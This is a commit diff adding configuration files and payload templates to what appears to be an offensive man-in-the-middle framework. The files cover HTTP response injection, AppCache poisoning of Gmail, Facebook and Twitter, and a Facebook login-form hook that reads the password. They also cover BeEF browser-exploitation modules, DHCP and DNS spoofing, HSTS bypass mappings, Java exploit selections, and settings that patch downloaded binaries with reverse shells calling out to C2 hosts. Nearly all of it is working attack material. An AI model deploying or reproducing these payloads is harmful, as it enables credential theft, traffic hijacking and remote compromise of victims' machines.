major changes for Responder integration

config/airpwn.cfg

@@ -0,0 +1,6 @@
+#Example config for the AirPwn plugin
+
+[site_hijack]
+match = ^(GET|POST).*
+ignore = (^GET [^ ?]+\.(?:jpg|jpeg|gif|png|ico|css)|(?:host: .*google.com))
+response = ./config_files/airpwn_templates/site_hijack

config/airpwn_templates/airpwn_cssbg

@@ -0,0 +1,10 @@
+HTTP/1.1 200 OK
+Content-type: text/css
+Content-length: 103
+
+body {
+  background-color: red;
+  background-image: url(/airpwnbg.jpg);
+  background-repeat: repeat;
+}
+  

config/airpwn_templates/ftp_resp

@@ -0,0 +1,2 @@
+331 FTP IS FUN!!!! ENJOY YOUR DATA!!!
+

config/airpwn_templates/greet_html

@@ -0,0 +1,11 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>HELLO DEFCON!</title>
+</head><body>
+<blink><font size=+5 color=red>
+Hello Defcon! Your wireless network is delicious!
+</font>
+</blink>
+<p>

config/airpwn_templates/js_html

@@ -0,0 +1,13 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>pwned</title>
+</head><body onLoad="
+alert('hi');
+alert('you');
+alert('are');
+alert('so');
+alert('owned');
+alert('cookie: ' + document.cookie);">
+

config/airpwn_templates/site_hijack

@@ -0,0 +1,15 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+Content-Length: 250
+
+<html>
+  <head><title>hugs</title></head>
+  <body>
+    <iframe frameborder=0 border=0 src="http://google.com" width="100%"
+      height="100%">hugs</iframe>
+    <div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
+      BYE BYE!
+
+
+<!--

config/app_cache_poison.cfg

@@ -0,0 +1,57 @@
+[DEFAULT]
+; HTML5 AppCache poisioning attack
+; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
+; generic settings for tampering engine
+
+enabled=True
+tamper_class=libs.AppCachePoisonClass
+;all settings below are specific for AppCachePoison
+
+templates_path=config_files/app_cache_poison_templates
+;enable_only_in_useragents=Chrome|Firefox
+
+; when visiting first url matching following expression we will embed iframes with all tamper URLs
+;(to poison the cache for all of them all at once)
+mass_poison_url_match=http://.*prezydent\.pl.*
+; it's only useful to mass poison chrome because:
+; - it supports iframe sandbox preventing framebusting
+; - does not ask for confirmation
+mass_poison_useragent_match=Chrome|Safari
+
+[test]
+; any //example.com URL redirects to iana and will display our spoofed content
+tamper_url=http://example.com/
+manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
+templates=test ; which templates to use for spoofing content?
+skip_in_mass_poison=1
+
+; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
+[gmail]
+tamper_url=http://mail.google.com/mail/
+; manifest has to be of last domain in redirect loop
+manifest_url=http://mail.google.com/robots.txt
+templates=default ; could be omitted
+
+[facebook]
+tamper_url=http://www.facebook.com/
+manifest_url=http://www.facebook.com/robots.txt
+templates=facebook ; use different template
+
+[twitter]
+tamper_url=http://twitter.com/
+;tamper_url_match=^http://(www\.)?twitter\.com/$
+manifest_url=http://twitter.com/robots.txt
+
+[testing]
+tamper_url=http://www.html5rocks.com/en/
+manifest_url=http://www.html5rocks.com/robots.txt
+
+; we can also modify non-HTML URLs to append malicious code to them
+; but for them to be cached in HTML5 AppCache they need to be referred in
+; manifest for a poisoned domain
+; if not, they are "only" cached for 10 years :D
+[ga]
+raw_url=http://www.google-analytics.com/ga.js
+templates=script
+skip_in_mass_poison=1
+;you can add other scripts in additional sections like jQuery etc.

config/app_cache_poison_templates/default.append

@@ -0,0 +1,38 @@
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<div style="padding: 1em;border:1px solid red;margin:1em">
+<h1>AppCache Poison works!</h1>
+<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
+</div>

config/app_cache_poison_templates/default.manifest

@@ -0,0 +1,8 @@
+CACHE MANIFEST
+CACHE:
+%%tamper_url%%
+http://www.google-analytics.com/ga.js
+NETWORK:
+*
+http://*
+https://**

config/app_cache_poison_templates/facebook.append

@@ -0,0 +1,46 @@
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<div style="padding: 1em;border:1px solid red;margin:1em">
+<h1>We work on Facebook too!</h1>
+<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create <code>facebook.append</code> or <code>facebook.replace</code> file and add your content there.</p>
+</div>
+<script>
+var f = document.getElementById('login_form').onsubmit;
+document.getElementById('login_form').onsubmit = function() {
+    alert("Hello, " + document.getElementById('email').value + ' ' + document.getElementById('pass').value);
+    return Event.__inlineSubmit(this,event);
+}
+</script>
+

config/app_cache_poison_templates/facebook.manifest

@@ -0,0 +1,7 @@
+CACHE MANIFEST
+CACHE:
+%%tamper_url%%
+NETWORK:
+*
+http://*
+https://**

config/app_cache_poison_templates/script.append

@@ -0,0 +1,2 @@
+
+;console.log('AppCache Poison was here. Google Analytics FTW');

config/app_cache_poison_templates/test.replace

@@ -0,0 +1,49 @@
+<html>
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+  
+  body { padding-left: 20em}
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<h1>Hurray!</h1>
+<p>AppCache Poison by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a></p>
+
+<p>If you're seeing this, <a href="http://github.com/koto/sslstrip">AppCache Poison</a> works correctly. Try going to <a href="http://facebook.com">http://facebook.com</a> to see it in action.</p>
+<script>
+if(!window.applicationCache) {
+    document.write('<strong>Your browser does not support HTML5 AppCache though, cache poisoning won\'t work:(</strong>');
+}
+<!-- and poison ga -->
+<img src="http://www.google-analytics.com/ga.js" />
+</script>
+</html>

config/beefautorun.cfg

@@ -0,0 +1,32 @@
+#Example config file for the BeefAutorun plugin
+
+mode = oneshot 
+#can be set to loop, or oneshot
+
+#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
+#in oneshot mode the plugin will run modules only once per hooked browser
+
+[ALL]  #Runs specified modules on all hooked browsers
+
+'Man-In-The-Browser'= '{}'
+
+
+[targets]  #Runs specified modules based on OS and Browser type
+	
+	[[Windows]]  #Target all Windows versions using Firefox and Internet Explorer
+		
+		[[[FF]]]
+		'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
+
+		[[[IE]]]
+		'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
+
+	[[Windows 7]]  #Target only Windows 7 using Chrome
+		
+		[[[C]]]
+		'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
+
+	[[Linux]] #Target Linux platforms using Chrome
+
+		[[[C]]]
+		'Redirect Browser (Rickroll)' = '{}'

config/dhcp.cfg

@@ -0,0 +1,4 @@
+#Example config file for DHCP spoofing
+ip_pool = 192.168.2.10-50
+subnet = 255.255.255.0
+dns_server = 192.168.2.20 #optional

config/dns.cfg

@@ -0,0 +1,3 @@
+#Example config file for DNS tampering
+www.facebook.com  = 192.168.10.1
+google.com = 192.168.10.1

config/filepwn.cfg

@@ -0,0 +1,56 @@
+[ZIP]
+# patchCount is the max number of files to patch in a zip file
+# After the max is reached it will bypass the rest of the files 
+# and send on it's way
+
+patchCount = 5
+
+# In Bytes
+maxSize = 40000000
+
+blacklist = .dll,  #don't do dlls in a zip file
+
+[targets]
+	#MAKE SURE that your settings for host and port DO NOT
+	# overlap between different types of payloads
+	
+	[[ALL]] # DEFAULT settings for all targets REQUIRED
+	
+	LinuxType = ALL 	# choices: x86/x64/ALL/None
+	WindowsType = ALL 	# choices: x86/x64/ALL/None
+	
+	FileSizeMax = 50000000  # ~50 MB (just under) No patching of files this large
+
+		[[[LinuxIntelx86]]]
+		SHELL = reverse_shell_tcp   # This is the BDF syntax
+		HOST = 192.168.1.168 		# The C2
+		PORT = 8888
+		SUPPLIED_SHELLCODE = None
+		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
+		
+		[[[LinuxIntelx64]]]
+		SHELL = reverse_shell_tcp
+		HOST = 192.168.10.4
+		PORT = 6666
+		SUPPLIED_SHELLCODE = None
+		MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+		[[[WindowsIntelx86]]]
+		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+		HOST = 192.168.10.4
+		PORT = 6666
+		SHELL = iat_reverse_tcp
+		SUPPLIED_SHELLCODE = None
+		ZERO_CERT = False
+		PATCH_DLL = True
+		MSFPAYLOAD = windows/shell_reverse_tcp
+
+		[[[WindowsIntelx64]]]
+		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+		HOST = 192.168.1.16
+		PORT = 8088
+		SHELL = reverse_shell_tcp
+		SUPPLIED_SHELLCODE = None
+		ZERO_CERT = True
+		PATCH_DLL = False
+		MSFPAYLOAD = windows/x64/shell_reverse_tcp

config/hsts_bypass.cfg

@@ -0,0 +1,11 @@
+#here you can configure your domains to bypass HSTS on
+#the format is real.domain.com = fake.domain.com
+
+#for google and gmail
+accounts.google.com = account.google.com
+mail.google.com = gmail.google.com
+accounts.google.se = cuentas.google.se
+
+#for facebook
+www.facebook.com = social.facebook.com
+facebook.com = social.facebook.com

config/javapwn.cfg

@@ -0,0 +1,5 @@
+#Example config file for the javapwn plugin
+1.702 = "java_atomicreferencearray"
+1.704 = "java_verifier_field_access"
+1.706 = "java_jre17_exec"
+1.707 = "java_jre17_jaxws"